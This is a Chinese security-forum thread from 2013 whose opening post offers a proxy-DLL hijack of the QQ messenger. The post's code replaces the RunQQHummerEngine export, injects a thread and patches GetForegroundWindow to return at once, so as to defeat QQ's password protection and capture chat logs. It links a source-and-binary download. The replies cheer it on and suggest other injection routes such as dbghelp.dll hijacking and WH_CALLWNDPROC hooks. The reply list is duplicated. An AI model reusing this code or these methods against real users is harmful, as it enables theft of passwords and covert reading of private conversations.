[原创]另类方法，停止qq的密码保护，截取聊天记录等-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]另类方法，停止qq的密码保护，截取聊天记录等

发表于: 2013-5-20 15:00 44638

[原创]另类方法，停止qq的密码保护，截取聊天记录等

elianmeng

2013-5-20 15:00

44638

 
void DisableGetForegroundWindow()
{
    HMODULE hUser32;
    LPBYTE pfn;
    DWORD dwOldProtect;
    hUser32 = LoadLibraryW(L"user32.dll");
    pfn = (LPBYTE)GetProcAddress(hUser32,"GetForegroundWindow");
    VirtualProtect(pfn,16,PAGE_EXECUTE_READWRITE,&dwOldProtect);
    pfn[0] = 0xC3; //retn
}
 
DWORD __stdcall workerThread(LPVOID lparam)
{
    DisableGetForegroundWindow();
 
    return 0;
}
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 入口函数
BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        DisableThreadLibraryCalls(hModule);
 
        Hook::Hook();
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        Free();
        Hook::Unhook();
 
    }
 
    return TRUE;
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
 
 
 
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// 导出函数
ALCDECL AheadLib_RunQQHummerEngine(void)
{
    // 保存返回地址
    __asm POP m_dwReturn[0 * TYPE long];
 
    CreateThread(NULL,0,workerThread,0,0,NULL);
 
    // 调用原始函数
    GetAddress("RunQQHummerEngine")();
 
    // 转跳到返回地址
    __asm JMP m_dwReturn[0 * TYPE long];
}
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

1.jpg （45.72kb，24次下载）
10.png （47.46kb，9次下载）
binAndSrc.rar （20.81kb，1010次下载）

收藏・66

免费・5

支持

最新回复 (81) 1 2 3 4 ▶
wertyuyuyu 雪币： 778 活跃值： (208) 能力值： ( LV9，RANK：260 ) 在线值：发帖 34 回帖 249 粉丝 1 关注私信	wertyuyuyu 4 2 楼 mark，火了卖位置！！！ 2013-5-20 15:07 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 3 楼好东西啊！我先在虚拟机验证一下 2013-5-20 15:09 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 4 楼又是一种思路！持续关注中 2013-5-20 15:10 0
pozhupt 雪币： 34 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 59 粉丝 0 关注私信	pozhupt 5 楼好东东啊。 2013-5-20 15:11 0
rettey 雪币： 19 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	rettey 6 楼厉害呀，下来看看 2013-5-20 15:11 0
Tebox 雪币： 1088 活跃值： (30) 能力值： ( LV3，RANK：20 ) 在线值：发帖 30 回帖 242 粉丝 0 关注私信	Tebox 7 楼 NB了.难道腾讯坑爹了不去验证DLL? 2013-5-20 15:18 0
wertyuyuyu 雪币： 778 活跃值： (208) 能力值： ( LV9，RANK：260 ) 在线值：发帖 34 回帖 249 粉丝 1 关注私信	wertyuyuyu 4 8 楼我劫持dbghelp.dll也可以 2013-5-20 15:27 0
sgogriu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 22 粉丝 0 关注私信	sgogriu 9 楼这不是DLL劫持，鉴定完毕！ 2013-5-20 15:53 0
Protected 雪币： 6723 活跃值： (1199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 344 粉丝 1 关注私信	Protected 10 楼前排占位 2013-5-20 16:04 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 11 楼测试了几个2013版都没用, 替换dll之后, QQ根本起不来; 2013-5-20 16:41 0
safeboy 雪币： 12 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 136 粉丝 0 关注私信	safeboy 12 楼火钳留名，楼主牛人，膜拜 2013-5-20 17:00 0
工程雪币： 87 活跃值： (205) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 91 粉丝 0 关注私信	工程 13 楼是不是部分版本才起作用？？？ 2013-5-20 17:03 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼赞同，不过依然支持楼主的钻研和奉献精神 2013-5-20 17:15 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 15 楼我来看热闹.. 2013-5-20 17:15 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 16 楼 GetForegroundWindow一直就是QQ密码保护的痛脚，09年我也在研究这个，感慨。。 2013-5-20 17:27 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 17 楼技术太老了。。不便评论。 2013-5-20 18:45 0
allenzh 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	allenzh 18 楼都痛脚了，那就割掉 2013-5-20 19:19 0
allenzh 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	allenzh 19 楼注册了快8年才发2帖 2013-5-20 19:21 0
绿豆雪雪币： 186 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	绿豆雪 20 楼必须Mark一下,很实用 2013-5-20 19:24 0
乐乐侠雪币： 14 活跃值： (88) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 105 粉丝 0 关注私信	乐乐侠 21 楼 HummerEngine被替了，真没有事？还是某些功能没有了？ 2013-5-20 20:57 0
学雄雪币： 371 活跃值： (72) 能力值： ( LV5，RANK：60 ) 在线值：发帖 19 回帖 426 粉丝 0 关注私信	学雄 1 22 楼围观~~~~~~ 2013-5-20 21:04 0
脑子很笨雪币： 109 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 11 粉丝 0 关注私信	脑子很笨 23 楼厉害学习了 2013-5-20 21:24 0
anticode 雪币： 238 活跃值： (216) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 76 粉丝 0 关注私信	anticode 24 楼好思路，谢谢楼主分享 2013-5-20 23:17 0
张双峻雪币： 387 活跃值： (66) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	张双峻 25 楼想要注入到QQ完全没这么麻烦吧。一个WH_CALLWNDPROC就搞定了。QQ2013测试通过。 2013-5-20 23:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

elianmeng

发帖

707

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (81) 1 2 3 4 ▶
wertyuyuyu 雪币： 778 活跃值： (208) 能力值： ( LV9，RANK：260 ) 在线值：发帖 34 回帖 249 粉丝 1 关注私信	wertyuyuyu 4 2 楼 mark，火了卖位置！！！ 2013-5-20 15:07 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 3 楼好东西啊！我先在虚拟机验证一下 2013-5-20 15:09 0
csshrb 雪币： 188 活跃值： (32) 能力值： ( LV4，RANK：50 ) 在线值：发帖 16 回帖 147 粉丝 0 关注私信	csshrb 1 4 楼又是一种思路！持续关注中 2013-5-20 15:10 0
pozhupt 雪币： 34 活跃值： (25) 能力值： ( LV3，RANK：20 ) 在线值：发帖 3 回帖 59 粉丝 0 关注私信	pozhupt 5 楼好东东啊。 2013-5-20 15:11 0
rettey 雪币： 19 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 25 粉丝 0 关注私信	rettey 6 楼厉害呀，下来看看 2013-5-20 15:11 0
Tebox 雪币： 1088 活跃值： (30) 能力值： ( LV3，RANK：20 ) 在线值：发帖 30 回帖 242 粉丝 0 关注私信	Tebox 7 楼 NB了.难道腾讯坑爹了不去验证DLL? 2013-5-20 15:18 0
wertyuyuyu 雪币： 778 活跃值： (208) 能力值： ( LV9，RANK：260 ) 在线值：发帖 34 回帖 249 粉丝 1 关注私信	wertyuyuyu 4 8 楼我劫持dbghelp.dll也可以 2013-5-20 15:27 0
sgogriu 雪币： 206 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 22 粉丝 0 关注私信	sgogriu 9 楼这不是DLL劫持，鉴定完毕！ 2013-5-20 15:53 0
Protected 雪币： 6723 活跃值： (1199) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 344 粉丝 1 关注私信	Protected 10 楼前排占位 2013-5-20 16:04 0
uing 雪币： 85 活跃值： (87) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 160 粉丝 0 关注私信	uing 11 楼测试了几个2013版都没用, 替换dll之后, QQ根本起不来; 2013-5-20 16:41 0
safeboy 雪币： 12 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 136 粉丝 0 关注私信	safeboy 12 楼火钳留名，楼主牛人，膜拜 2013-5-20 17:00 0
工程雪币： 87 活跃值： (205) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 91 粉丝 0 关注私信	工程 13 楼是不是部分版本才起作用？？？ 2013-5-20 17:03 0
代码疯子雪币： 270 活跃值： (97) 能力值： ( LV8，RANK：140 ) 在线值：发帖 22 回帖 423 粉丝 1 关注私信	代码疯子 3 14 楼赞同，不过依然支持楼主的钻研和奉献精神 2013-5-20 17:15 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 15 楼我来看热闹.. 2013-5-20 17:15 0
tihty 雪币： 27 活跃值： (127) 能力值： ( LV8，RANK：120 ) 在线值：发帖 29 回帖 1095 粉丝 3 关注私信	tihty 2 16 楼 GetForegroundWindow一直就是QQ密码保护的痛脚，09年我也在研究这个，感慨。。 2013-5-20 17:27 0
tishion 雪币： 496 活跃值： (286) 能力值： ( LV13，RANK：400 ) 在线值：发帖 20 回帖 319 粉丝 11 关注私信	tishion 9 17 楼技术太老了。。不便评论。 2013-5-20 18:45 0
allenzh 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	allenzh 18 楼都痛脚了，那就割掉 2013-5-20 19:19 0
allenzh 雪币： 100 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 20 粉丝 0 关注私信	allenzh 19 楼注册了快8年才发2帖 2013-5-20 19:21 0
绿豆雪雪币： 186 活跃值： (136) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 17 粉丝 0 关注私信	绿豆雪 20 楼必须Mark一下,很实用 2013-5-20 19:24 0
乐乐侠雪币： 14 活跃值： (88) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 105 粉丝 0 关注私信	乐乐侠 21 楼 HummerEngine被替了，真没有事？还是某些功能没有了？ 2013-5-20 20:57 0
学雄雪币： 371 活跃值： (72) 能力值： ( LV5，RANK：60 ) 在线值：发帖 19 回帖 426 粉丝 0 关注私信	学雄 1 22 楼围观~~~~~~ 2013-5-20 21:04 0
脑子很笨雪币： 109 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 11 粉丝 0 关注私信	脑子很笨 23 楼厉害学习了 2013-5-20 21:24 0
anticode 雪币： 238 活跃值： (216) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 76 粉丝 0 关注私信	anticode 24 楼好思路，谢谢楼主分享 2013-5-20 23:17 0
张双峻雪币： 387 活跃值： (66) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	张双峻 25 楼想要注入到QQ完全没这么麻烦吧。一个WH_CALLWNDPROC就搞定了。QQ2013测试通过。 2013-5-20 23:31 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复